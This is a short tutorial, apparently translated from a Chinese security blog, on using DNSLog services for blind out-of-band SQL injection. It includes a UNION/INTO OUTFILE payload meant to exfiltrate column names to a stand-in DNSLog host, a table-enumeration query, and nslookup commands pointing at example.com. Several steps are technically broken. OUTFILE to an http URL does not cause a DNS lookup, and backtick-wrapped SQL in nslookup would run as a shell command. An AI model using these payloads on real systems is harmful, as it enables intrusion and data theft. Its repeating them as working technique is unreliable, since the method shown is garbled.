DNSLog concept
DNSLog (Domain Name System Log) is a special technology and service for capturing and logging requests and responses made through the Domain Name System (DNS) protocol. Its purpose is to help users track, analyze and manage DNS traffic and collect information related to domain names.
Basically, the DNSLog service provides a custom DNS server that keeps requests in a log and generates a unique domain name for each request. When a client (such as a web browser, application) sends a DNS request, the server will record the request and then generate a response containing some information about the original request. This information may include IP addresses, user agent strings, timestamps and other relevant data.
The principle of DNSLog non-echo injection
Echoless injection refers to an injection method that obtains the injection result through DNSLog when the injection point cannot directly obtain the response. The principle of echoless injection is to use the injection result as part of the DNS request, and get the response of the DNS request through DNSLog to obtain the injection result.
Steps to implement no-echo injection using DNSLog
-
Construct injection payload: According to the injection point of the target application, construct the injection payload used to trigger the DNS request. For example, in the case of SQL injection attacks, the following payload can be used:
' OR 1=1 UNION SELECT 1, group_concat(column_name) FROM information_schema.columns INTO OUTFILE 'http://your-dnslog-service.com/' --
This payload will trigger a DNS request to send the column name information from the target application to the DNSLog service.
-
Insert Payload: Insert the payload at the injection point of the target application. The exact method depends on the structure and vulnerability points of the target application. Typically, the injection point is in an application's input field.
-
Trigger injection: Submit a request processed by the injection payload to the application to trigger an injection attack.
-
Check DNSLog service: Visit the DNSLog service of your choice to check if DNS requests are received. If the injection is successfully triggered, you will be able to see the corresponding request recorded on the DNSLog service.
give a chestnut
Use DNSLog to get database table information
Injection point: Find the injection point in the target application and construct the injection statement.
SELECT table_name FROM information_schema.tables WHERE table_schema=database()
Send the injection statement to the DNSLog server as part of the DNS request.
nslookup `SELECT table_name FROM information_schema.tables WHERE table_schema=database()`.example.com
View the response of the DNS request on the DNSLog server to obtain the injection result.
nslookup -type=txt SELECT.*.example.com
diagram
You can refer to the article of the big guy
SQL injection dnslog injection – ngin0x's blog